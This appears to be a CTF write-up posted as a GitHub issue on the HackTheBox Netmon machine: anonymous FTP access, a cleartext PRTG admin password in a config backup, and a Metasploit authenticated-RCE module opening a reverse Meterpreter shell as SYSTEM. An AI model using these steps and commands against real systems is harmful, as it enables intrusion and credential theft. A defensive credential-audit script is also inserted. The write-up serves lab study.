roaris / ctf-log


HackTheBox: Netmon (Machine Easy) #5

Open roaris opened 6 months ago

roaris commented 6 months ago

https://app.hackthebox.com/machines/Netmon

$ nmap -sC -sV -Pn 10.10.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-23 22:10 JST
Nmap scan report for 10.10.10.152
Host is up (0.49s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_11-10-23  09:20AM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2024-02-23T13:11:22
|_  start_date: 2024-02-23T13:08:29

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.98 seconds
roaris commented 6 months ago

It says Anonymous FTP login allowed (FTP code 230), so I try it.

$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:roaris): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49878|)
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
11-10-23  09:20AM       <DIR>          Windows
226 Transfer complete.
roaris commented 6 months ago

Found /Users/Public/Desktop/user.txt. So you can't get it unless you cd all the way down to Desktop...

ftp> get Users/Public/Desktop/user.txt
local: Users/Public/Desktop/user.txt remote: Users/Public/Desktop/user.txt
ftp: Can't access `Users/Public/Desktop/user.txt': No such file or directory
ftp> cd Users/Public
250 CWD command successful.
ftp> cd Desktop
250 CWD command successful.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||49921|)
150 Opening ASCII mode data connection.
100% |*****************************************|    34        0.08 KiB/s    00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.05 KiB/s)
roaris commented 6 months ago

/Users/Administrator is not accessible.

ftp> dir Users/Administrator
229 Entering Extended Passive Mode (|||49890|)
550 Access is denied.
roaris commented 6 months ago

Checking port 80 in a browser shows a login screen for an application called PRTG Network Monitor. Checked SecLists, but no hits.

$ find /usr/share/SecLists -iname *prtg*

The default credentials came up as prtgadmin / prtgadmin, so I tried those too, but no luck.

roaris commented 6 months ago

Let's look at the FTP side a bit more.

https://e-words.jp/w/.lnk%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB.html says .lnk is apparently a Windows shortcut file.

ftp> dir Users/Public/Desktop
229 Entering Extended Passive Mode (|||50103|)
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1195 PRTG Enterprise Console.lnk
02-02-19  11:18PM                 1160 PRTG Network Monitor.lnk
02-23-24  08:09AM                   34 user.txt
226 Transfer complete.

Looking in Program Files (x86)/PRTG Network Monitor doesn't turn up anything that would lead to a login either.

ftp> dir Program\ Files\ (x86)/PRTG\ Network\ Monitor
229 Entering Extended Passive Mode (|||50361|)
125 Data connection already open; Transfer starting.
02-02-19  11:17PM       <DIR>          64 bit
02-02-19  11:15PM                 1888 activation.dat
02-02-19  11:18PM       <DIR>          cert
12-14-17  12:40PM              2461696 chartdir51.dll
12-14-17  12:40PM              9077248 ChilkatDelphiXE.dll
12-14-17  12:40PM              2138986 chrome.pak
02-02-19  11:17PM       <DIR>          Custom Sensors
12-14-17  12:40PM               382464 dbexpmda40.dll
12-14-17  12:40PM               519680 dbexpoda40.dll
12-14-17  12:40PM               377856 dbexpsda40.dll
12-14-17  12:40PM                 5681 defaultmaps.xml
12-14-17  12:40PM                12871 defaultmaps_iad.xml
02-13-18  02:08PM                 1224 deviceiconlist.txt
02-02-19  11:17PM       <DIR>          devicetemplates
02-23-24  08:08AM       <DIR>          dlltemp
02-02-19  11:18PM       <DIR>          download
12-14-17  12:40PM                 6667 ethertype.txt
12-14-17  12:40PM                 6218 FlowRules.osr
02-02-19  11:18PM       <DIR>          helperlibs
12-14-17  12:40PM              9956864 icudt.dll
12-14-17  12:40PM                 1665 ipmi_bsd-2.0.txt
02-02-19  11:16PM       <DIR>          language
12-14-17  12:40PM              3707349 Lb2to3.exe
12-14-17  12:40PM             24978944 libcef.dll
12-14-17  12:40PM              1412096 libeay32.dll
02-02-19  11:17PM       <DIR>          locales
02-02-19  11:18PM       <DIR>          lookups
02-16-18  10:03AM               796566 macmanufacturerlist.txt
02-02-19  11:18PM       <DIR>          MIB
12-14-17  12:40PM                  522 Microsoft.VC80.CRT.manifest
12-14-17  12:40PM               421200 msvcp100.dll
12-14-17  12:40PM               770384 msvcr100.dll
12-14-17  12:40PM               630544 msvcr80.dll
12-14-17  12:40PM                12498 netsnmp-license.txt
02-02-19  11:17PM       <DIR>          Notifications
12-14-17  12:40PM                    0 Npgsql.txt
12-14-17  12:40PM               487936 openssl.exe
01-18-18  10:03AM               177152 paelibssh.dll
12-14-17  12:40PM                35088 paesslerchart.dll
12-14-17  12:40PM              1083904 PaesslerSNMP.dll
02-15-18  04:24PM              1074688 PaesslerSNMPWrapper.dll
12-14-17  12:40PM               421160 PaesslerSQLEngine.dll
12-14-17  12:40PM               193832 PaesslerSQLEngineDBX.dll
12-14-17  12:40PM               331536 paesslerVMWareShell.exe
12-14-17  12:40PM               310032 paesslerVMWareShell.vshost.exe
12-14-17  12:40PM                 1429 phantomjs-license.bsd
12-14-17  12:40PM                 1428 protocol.txt
02-16-18  10:04AM              6379096 PRTG Administrator.exe
02-16-18  10:05AM             12923480 PRTG Enterprise Console.exe
02-16-18  10:04AM              5439576 PRTG GUI Starter.exe
02-02-19  11:17PM       <DIR>          PRTG Installer Archive
02-16-18  10:05AM             11647576 PRTG Probe.exe
02-16-18  10:05AM              7026776 PRTG Server.exe
02-02-19  11:18PM              2000256 PRTG Setup Log.log
02-02-19  11:17PM       <DIR>          prtg-installer-for-distribution
12-14-17  12:40PM               300318 prtg.ico
12-14-17  12:40PM               444640 PrtgDllWrapper.exe
02-16-18  10:04AM              2778200 PRTGProbeUpdate.exe
02-16-18  10:04AM              3227224 PrtgRemoteInstall.exe
02-16-18  10:04AM              2782808 PRTGServerUpdate.exe
02-16-18  10:04AM              2104408 PRTG_Chromium_Helper.exe
02-16-18  10:04AM              2264664 PRTG_IE_Helper.exe
02-02-19  11:17PM       <DIR>          Python34
02-16-18  10:04AM              1012224 RegWrapper.exe
02-02-19  11:17PM       <DIR>          Sensor System
02-02-19  11:17PM       <DIR>          snmplibs
02-02-19  11:18PM       <DIR>          snmptemp
01-18-18  10:03AM               461824 ssh.dll
12-14-17  12:40PM               384512 ssleay32.dll
02-02-19  11:18PM       <DIR>          themes
02-02-19  11:18PM              1275563 unins000.dat
02-02-19  11:15PM              1498815 unins000.exe
12-14-17  12:40PM              1163024 VimService2005.dll
12-14-17  12:40PM              4312848 VimService2005.XmlSerializers.dll
02-02-19  11:17PM       <DIR>          webroot
226 Transfer complete.
roaris commented 6 months ago

Searching for "prtg network monitor configuration location" turns up https://kb.paessler.com/en/topic/89431-how-to-copy-data-files-and-custom-files-from-prtg-data-directory#:~:text=The%20PRTG%20Data%20folder%20by,configuration%20of%20your%20PRTG%20server. which says:

The PRTG Data folder by default located under "C:\ProgramData\Paessler\PRTG Network Monitor" contains all the monitoring data (logs, historic data, tickets, reports, etc.) as well as the configuration of your PRTG server. The content of this folder must be copied on the new server (in the same folder) if you want to keep this data.

ftp> dir
229 Entering Extended Passive Mode (|||50542|)
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
11-10-23  09:20AM       <DIR>          Windows
226 Transfer complete.

Running dir at the root doesn't show any ProgramData, but apparently it's there.

ftp> dir ProgramData/Paessler/PRTG\ Network\ Monitor
229 Entering Extended Passive Mode (|||50430|)
125 Data connection already open; Transfer starting.
08-18-23  07:20AM       <DIR>          Configuration Auto-Backups
02-23-24  08:09AM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
02-23-24  08:09AM       <DIR>          Logs (Web Server)
02-23-24  08:14AM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
02-23-24  08:50AM              1680940 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.
roaris commented 6 months ago

Download and check the three files PRTG Configuration.dat, PRTG Configuration.old, and PRTG Configuration.old.bak. They were all XML files.

Searching for "password" found that PRTG Configuration.old.bak contains the information that prtgadmin's password is PrTg@dmin2018.
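
As an added example (not from the original issue and not Paessler's code), here is an audit script a defender could run over a configuration backup like the one found above to list which credential fields are stored in cleartext and therefore need rotating. The XML sample is constructed and only loosely shaped like a PRTG backup; the tag names (dbpassword, dbcredentials, snmpcommunity) are assumptions, not the real schema.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample, loosely shaped like a PRTG configuration backup.
# It is NOT the file from the box and does not claim to match Paessler's schema.
SAMPLE_BACKUP = """<prtg version="18.1.37.13946">
  <data>
    <user id="100">
      <login>prtgadmin</login>
      <dbpassword>PrTg@dmin2018</dbpassword>
      <dbcredentials>
        <dbuser>sensor_ro</dbuser>
        <dbpassword>Winter2018!</dbpassword>
      </dbcredentials>
    </user>
    <user id="101">
      <login>viewer</login>
      <dbpassword></dbpassword>
    </user>
    <snmpcommunity>public</snmpcommunity>
  </data>
</prtg>
"""

# Tag names that usually hold a credential (assumed list, extend as needed).
SECRET_TAG = re.compile(r"pass(word|wd|phrase)|secret|community", re.IGNORECASE)


def find_cleartext_secrets(xml_text):
    """Return [(path, owner login or None, value)] for every element whose tag
    looks like a credential field and that carries non-empty text."""
    root = ET.fromstring(xml_text)
    findings = []

    def walk(elem, path, owner):
        # Remember the nearest enclosing <login> so a finding can be attributed.
        login = elem.find("login")
        if login is not None and login.text:
            owner = login.text.strip()
        for child in elem:
            child_path = f"{path}/{child.tag}"
            text = (child.text or "").strip()   # empty fields are not findings
            if SECRET_TAG.search(child.tag) and text:
                findings.append((child_path, owner, text))
            walk(child, child_path, owner)

    walk(root, root.tag, None)
    return findings


def redact(value):
    """Mask a secret for a report: keep the first 2 characters and the length."""
    return value[:2] + "*" * max(len(value) - 2, 0)
```

Each finding is a credential that was readable by anyone with access to the backup (here: anonymous FTP), so it should be treated as exposed and rotated rather than merely incremented.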

roaris commented 6 months ago

However, as the name old.bak suggests, this is a backup of an old configuration, so you can't log in with prtgadmin / PrTg@dmin2018.

It looks like a password set in 2018, so I try prtgadmin / PrTg@dmin2019, but that doesn't work either.

Even according to the writeup, prtgadmin / PrTg@dmin2019 is supposed to be correct...

roaris commented 6 months ago

After restarting the machine, I was able to log in with prtgadmin / PrTg@dmin2019. That makes no sense at all...

roaris commented 6 months ago

Skimmed through the pages, but no flag in particular. It says version 18.1.37.13946.

Searching for "prtg 18.1.37 exploit" shows there is a command injection vulnerability (CVE-2018-9276).

roaris commented 6 months ago

Try exploit/windows/http/prtg_authenticated_rce.

msf6 > search prtg

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/windows/http/prtg_authenticated_rce_cve_2023_32781  2023-08-09       excellent  Yes    PRTG CVE-2023-32781 Authenticated RCE
   1  exploit/windows/http/prtg_authenticated_rce                 2018-06-25       excellent  Yes    PRTG Network Monitor Authenticated RCE

Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/prtg_authenticated_rce
roaris commented 6 months ago

Typing shell starts a shell.

msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_PASSWORD PrTg@dmin2019
ADMIN_PASSWORD => PrTg@dmin2019
msf6 exploit(windows/http/prtg_authenticated_rce) > set RHOSTS 10.10.10.152
RHOSTS => 10.10.10.152
msf6 exploit(windows/http/prtg_authenticated_rce) > set LHOST 10.10.16.3
LHOST => 10.10.16.3
msf6 exploit(windows/http/prtg_authenticated_rce) > exploit

[*] Started reverse TCP handler on 10.10.16.3:4444
[+] Successfully logged in with provided credentials
[+] Created malicious notification (objid=2018)
[+] Triggered malicious notification
[+] Deleted malicious notification
[*] Waiting for payload execution.. (30 sec. max)
[*] Sending stage (176198 bytes) to 10.10.10.152
[*] Meterpreter session 1 opened (10.10.16.3:4444 -> 10.10.10.152:50022) at 2024-02-23 23:41:35 +0900

meterpreter > shell
Process 3064 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Find root.txt and done.

C:\>dir /s root.txt
dir /s root.txt
 Volume in drive C has no label.
 Volume Serial Number is 0EF5-E5E5

 Directory of C:\Users\Administrator\Desktop

02/23/2024  09:26 AM                34 root.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)   6,723,411,968 bytes free